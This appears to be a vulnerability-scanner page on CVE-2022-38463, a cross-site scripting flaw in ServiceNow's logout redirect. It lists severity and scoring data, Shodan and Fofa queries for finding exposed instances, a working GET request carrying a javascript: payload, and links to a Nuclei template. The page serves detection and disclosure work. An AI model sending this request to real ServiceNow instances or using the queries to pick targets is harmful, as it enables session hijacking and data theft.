| Title | ServiceNow - Cross-Site Scripting |
|---|---|
| Author | amanrawat |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance. |
| Remediation | Apply the latest security patches provided by ServiceNow to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.46526 |
| CVE ID | CVE-2022-38463 |
| CWE ID | CWE-79 |
| Shodan Query | http.title:"ServiceNow"http.title:"servicenow"http.favicon.hash:1701804003 |
| Fofa Query | title="servicenow"icon_hash=1701804003 |
| Tags | cve cve2022 servicenow xss vuln |
ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.
GET /logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38463.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-38463.pcap
N/AN/A